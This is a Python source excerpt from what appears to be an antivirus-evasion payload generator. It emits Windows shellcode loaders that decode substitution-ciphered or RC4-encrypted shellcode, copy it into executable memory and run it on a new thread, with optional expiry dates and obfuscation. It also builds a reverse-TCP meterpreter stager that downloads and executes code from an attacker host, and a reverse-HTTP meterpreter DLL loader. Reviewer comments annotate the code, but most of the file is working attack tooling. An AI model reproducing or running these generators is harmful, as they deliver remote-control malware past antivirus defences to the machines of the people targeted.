            # Get our current date and add number of days to the date
            todaysdate = date.today()
            # raises ValueError for a non-integer EXPIRE_PAYLOAD value
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
            # Extra Variables
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # Create Payload File
            payload_code = 'import ctypes as avlol\n'
            payload_code += 'from string import maketrans\n'
            payload_code += 'from datetime import datetime\n'
            payload_code += 'from datetime import date\n\n'
            # expiry gate: local target clock vs. a two-digit-year date ([2:] drops the century)
            payload_code += RandToday + ' = datetime.now()\n'
            payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            # same loader body as above, indented one tab under the date check
            payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
            payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
    if self.required_options["INJECT_METHOD"][0].lower() == "heap":
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            HeapVar = helpers.randomString()
            # Create Payload File
            payload_code = 'import ctypes as avlol\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            # NOTE(review): the bytearray line is emitted twice; harmless but redundant
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            # HEAP_CREATE_ENABLE_EXECUTE (0x00040000): an executable private heap, sized 2x the shellcode
            payload_code += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n'
            # HEAP_ZERO_MEMORY (0x00000008)
            payload_code += rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n'
            payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
            # Extra Variables
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            HeapVar = helpers.randomString()
            # Create Payload File
            payload_code = 'import ctypes as avlol\n'
            payload_code += 'from string import maketrans\n'
            payload_code += 'from datetime import datetime\n'
            payload_code += 'from datetime import date\n\n'
            # expiry gate, as in the virtual branch
            payload_code += RandToday + ' = datetime.now()\n'
            payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            # NOTE(review): duplicated line, same as the non-expiring heap branch
            payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + shellcode_variable_name + ') * 2),avlol.c_int(0))\n'
            payload_code += '\t' + rand_ptr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + shellcode_variable_name + ')))\n'
            payload_code += '\t' + rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += '\t' + rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            payload_code += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
    else:
        # any INJECT_METHOD other than "virtual"/"heap" (including typos) lands here:
        # a ctypes string buffer is cast to a function pointer and called directly
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            #Additional random variable names
            # NOTE(review): rand_reverse_shell is generated but never emitted
            rand_reverse_shell = helpers.randomString()
            rand_memory_shell = helpers.randomString()
            rand_shellcode = helpers.randomString()
            # Create Payload File
            payload_code = 'from ctypes import *\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
            # no VirtualAlloc/protection change: presumably relies on the process
            # allowing execution from this buffer's pages -- confirm DEP assumptions
            payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
            payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
            # note: no trailing newline on the final call
            payload_code += rand_shellcode + '()'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
            # Extra Variables
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            #Additional random variable names
            # NOTE(review): rand_reverse_shell is generated but never emitted
            rand_reverse_shell = helpers.randomString()
            rand_memory_shell = helpers.randomString()
            rand_shellcode = helpers.randomString()
            # Create Payload File
            payload_code = 'from ctypes import *\n'
            payload_code += 'from string import maketrans\n'
            payload_code += 'from datetime import datetime\n'
            payload_code += 'from datetime import date\n\n'
            # expiry gate, as in the other branches
            payload_code += RandToday + ' = datetime.now()\n'
            payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += '\t' + rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
            payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
            payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
            payload_code += '\t' + rand_shellcode + '()'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
def generate(self) -> str:
    """Build a Python 2 reverse-TCP stager that downloads a stage from the handler and runs it.

    The emitted script connects to ``LHOST``:``LPORT``, reads a 4-byte little-endian
    length, receives that many bytes, patches the socket's file descriptor into the
    first five bytes (``0xBF`` = ``mov edi, imm32`` followed by the fd), copies the
    result into RWX memory and runs it on a new thread.  With ``expire_payload``
    set to a number of days the download/inject calls are wrapped in a local-clock
    date check.

    Returns:
        The stager source as a string, wrapped by ``encryption.pyherion`` when
        ``use_pyherion`` is ``y``.

    Raises:
        ValueError: ``expire_payload`` is neither ``x`` nor an integer.

    Security notes (reviewer):
      * The stage arrives over plaintext TCP with no authentication or integrity
        check; the length prefix and every received byte are trusted and executed.
        Anyone who can reach or redirect ``LHOST``:``LPORT`` controls what runs.
      * Every failure in the download path is swallowed by a bare ``except`` in the
        generated code, so a short read or a bad length silently yields ``None``
        and the stager exits without injecting.
      * ``LHOST``/``LPORT`` are interpolated into the generated source verbatim;
        a quote or newline in either would change the emitted program -- the
        values are operator-supplied, but they are not validated here.
      * Option keys here are lower-case (``expire_payload``, ``use_pyherion``)
        while other generators in this file use upper-case -- presumably the
        option dict is case-sensitive; confirm against the caller.
    """
    # randomize all of the variable names used
    shellCodeName = helpers.randomString()
    socketName = helpers.randomString()
    # NOTE(review): intervalName and attemptsName are never emitted (no retry loop)
    intervalName = helpers.randomString()
    attemptsName = helpers.randomString()
    getDataMethodName = helpers.randomString()
    fdBufName = helpers.randomString()
    rcvStringName = helpers.randomString()
    rcvCStringName = helpers.randomString()
    injectMethodName = helpers.randomString()
    tempShellcodeName = helpers.randomString()
    shellcodeBufName = helpers.randomString()
    fpName = helpers.randomString()
    tempCBuffer = helpers.randomString()
    payloadCode = "import struct, socket, binascii, ctypes, random, time\n"
    # socket and shellcode variables that need to be kept global
    payloadCode += "%s, %s = None, None\n" % (shellCodeName, socketName)
    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payloadCode += "def %s():\n" % (getDataMethodName)
    payloadCode += "\ttry:\n"
    payloadCode += "\t\tglobal %s\n" % (socketName)
    # build the socket and connect to the handler
    payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName)
    # LHOST/LPORT are emitted verbatim into the connect() call
    payloadCode += "\t\t%s.connect(('%s', %s))\n" % ( socketName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    # pack the underlying socket file descriptor into a c structure
    payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, socketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    # (signed little-endian; fewer than 4 bytes makes unpack raise -> swallowed below)
    payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" % ( socketName)
    # the buffer is seeded with a single space; it is overwritten by the 0xBF byte below
    payloadCode += "\t\t%s = \" \"\n" % (rcvStringName)
    # receive ALL of the payload .dll data
    # NOTE(review): len() counts the seed space, so the loop stops after l-1 received
    # bytes; whether that last byte matters depends on the handler's stage layout -- confirm
    payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, socketName)
    payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % ( rcvCStringName, rcvStringName, rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName)
    # copy the socket fd in
    # (this overwrites the first four received bytes -- the stage format presumably
    # reserves them for the fd; verify against the handler)
    payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName)
    payloadCode += "\t\treturn %s\n" % (rcvCStringName)
    # bare except: any connect/recv/unpack error becomes a silent None
    payloadCode += "\texcept: return None\n"
    # build the method that injects the .dll into memory
    payloadCode += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
    payloadCode += "\tif %s != None:\n" % (tempShellcodeName)
    payloadCode += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName)
    # allocate enough virtual memory to stuff the .dll in
    # MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40): RWX private memory
    payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % ( fpName, shellcodeBufName)
    # virtual lock to prevent the memory from paging out to disk
    payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % ( fpName, shellcodeBufName)
    payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % ( tempCBuffer, shellcodeBufName, shellcodeBufName)
    # copy the .dll into the allocated memory
    payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % ( fpName, tempCBuffer, shellcodeBufName)
    # kick the thread off to execute the .dll
    payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % ( fpName)
    # wait for the .dll execution to finish
    payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"
    # set up expiration options if specified
    if self.required_options["expire_payload"][0].lower() == "x":
        # download the stager
        payloadCode += "%s = %s()\n" % (shellCodeName, getDataMethodName)
        # inject what we grabbed
        payloadCode += "%s(%s)\n" % (injectMethodName, shellCodeName)
    else:
        # Get our current date and add number of days to the date
        todaysdate = date.today()
        # raises ValueError for a non-integer expire_payload value
        expiredate = str(todaysdate + timedelta( days=int(self.required_options["expire_payload"][0])))
        randToday = helpers.randomString()
        randExpire = helpers.randomString()
        # these imports land after the function definitions; fine for Python, just unusual
        payloadCode += 'from datetime import datetime\n'
        payloadCode += 'from datetime import date\n\n'
        # expiry gate: local target clock vs. a two-digit-year date ([2:] drops the century)
        payloadCode += randToday + ' = datetime.now()\n'
        payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n'
        payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n'
        # download the stager
        payloadCode += "\t%s = %s()\n" % (shellCodeName, getDataMethodName)
        # inject what we grabbed
        payloadCode += "\t%s(%s)\n" % (injectMethodName, shellCodeName)
    if self.required_options["use_pyherion"][0].lower() == "y":
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
def generate(self) -> str:
    """Build a Python loader that carries a patched, reverse-HTTP meterpreter DLL inline.

    The DLL is taken from ``patch.headerPatch()``, its transport patched to plain
    HTTP, its callback URL and User-Agent overwritten, then raw-deflated and
    base64-encoded by ``helpers.deflate``.  The emitted script inflates it and
    either casts the buffer to a function pointer (``inject_method`` == ``void``)
    or copies it into RWX memory and starts a thread on it (any other value).

    Returns:
        The loader source as a string, wrapped by ``encryption.pyherion`` when
        ``use_pyherion`` is ``y``.

    Security notes (reviewer):
      * ``patchTransport(..., False)`` and the ``http://`` scheme mean the C2
        channel is cleartext HTTP; there is no transport confidentiality.
      * The callback URL and UA are patched as NUL-terminated C strings
        (``"\\x00"``) -- the host/port come from ``LHOST``/``LPORT`` with no
        validation of length or characters against the DLL's buffer; presumably
        ``patch.patchURL`` enforces that -- confirm.
      * The hard-coded ``MSIE 6.1`` User-Agent is a static, dated indicator.
      * Option keys here are lower-case (``inject_method``, ``use_pyherion``);
        other generators in this file use upper-case -- confirm the dict's casing.
    """
    # get the main meterpreter .dll with the header/loader patched
    meterpreterDll = patch.headerPatch()
    # turn off SSL
    meterpreterDll = patch.patchTransport(meterpreterDll, False)
    # replace the URL
    # http:// (cleartext) + LHOST:LPORT + a URI segment from helpers.genHTTPChecksum()
    # (presumably the handler's checksum-routed path -- confirm) + NUL terminator
    urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
    meterpreterDll = patch.patchURL(meterpreterDll, urlString)
    # replace in the UA
    meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
    # compress/base64 encode the dll
    compressedDll = helpers.deflate(meterpreterDll)
    # actually build out the payload
    payloadCode = ""
    # traditional void pointer injection
    if self.required_options["inject_method"][0].lower() == "void":
        # doing void * cast
        payloadCode += "from ctypes import *\nimport base64,zlib\n"
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randVarName = helpers.randomString()
        # deflate function
        # wbits=-15 -> raw deflate stream (no zlib header), matching helpers.deflate
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        # randVarName is deliberately re-drawn: the first name was the inflate
        # function's local, this one holds the inflated DLL at module level
        randVarName = helpers.randomString()
        randFuncName = helpers.randomString()
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        # cast the str's buffer straight to a function pointer -- no page-protection
        # change; presumably relies on the process allowing execution there -- confirm
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
    # VirtualAlloc() injection
    else:
        # any inject_method other than "void" (including typos) takes this path
        payloadCode += 'import ctypes,base64,zlib\n'
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randVarName = helpers.randomString()
        randPtr = helpers.randomString()
        randBuf = helpers.randomString()
        randHt = helpers.randomString()
        # deflate function
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        # here randVarName is reused for both the inflate local and the module-level bytearray
        payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
        # MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40): RWX private memory
        payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
        payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
        # run on a new thread and block until it returns (INFINITE = -1)
        payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
def generate(self) -> str:
    """Build a Python 2 loader that carries RC4-encrypted msfvenom shellcode plus its key.

    ``encryption.encryptARC`` encrypts the shellcode and returns the key (and an
    ``iv`` that RC4 does not use).  The emitted script decrypts with
    ``Crypto.Cipher.ARC4`` and then executes via one of three styles chosen by
    ``INJECT_METHOD`` (``virtual`` -> VirtualAlloc/CreateThread, ``heap`` ->
    HeapCreate/HeapAlloc/CreateThread, anything else -> ctypes function-pointer
    cast), each in a plain and a date-gated (``EXPIRE_PAYLOAD``) variant.

    The emitted loader is Python 2 only (``string_escape`` codec) and needs
    PyCrypto on the target.

    Returns:
        The loader source as a string, wrapped by ``encryption.pyherion`` when
        ``USE_PYHERION`` is ``y``.

    Raises:
        ValueError: ``EXPIRE_PAYLOAD`` is neither ``x`` nor an integer.

    Security notes (reviewer):
      * The RC4 key is written into the same file as the ciphertext, so this is
        obfuscation rather than confidentiality: anyone holding the loader
        recovers the shellcode by running the first few lines.  RC4 itself is
        deprecated.
      * ``RandIV``/``iv`` is emitted but never used -- ``ARC4.new(key)`` takes no
        IV.  It is dead data in the payload.
      * Execution is from RWX memory (PAGE_EXECUTE_READWRITE, 0x40) or an
        executable heap (HEAP_CREATE_ENABLE_EXECUTE); the ``else`` branch casts a
        ctypes buffer to a function pointer with no protection change.
      * The expiry gate is a local-clock comparison against a two-digit-year date.
    """
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            # (called without self.required_options here, unlike other generators in this file)
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandARCKey = helpers.randomString()
            RandARCPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes as avlol\n'
            # key and ciphertext ship side by side; the iv line is never referenced
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
            # assumes the plaintext is itself a string_escape literal (decoded after decrypt) -- TODO confirm
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            # MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40): RWX private memory
            PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            # run on a new thread and block until it returns (INFINITE = -1)
            PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            # raises ValueError for a non-integer EXPIRE_PAYLOAD value
            expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandARCKey = helpers.randomString()
            RandARCPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes as avlol\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            # expiry gate: local target clock vs. a two-digit-year date ([2:] drops the century)
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            # same loader body as above, indented one tab under the date check
            PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
            PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + ShellcodeVariableName + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
            PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
    if self.required_options["INJECT_METHOD"][0].lower() == "heap":
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandARCKey = helpers.randomString()
            RandARCPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            HeapVar = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes as avlol\n'
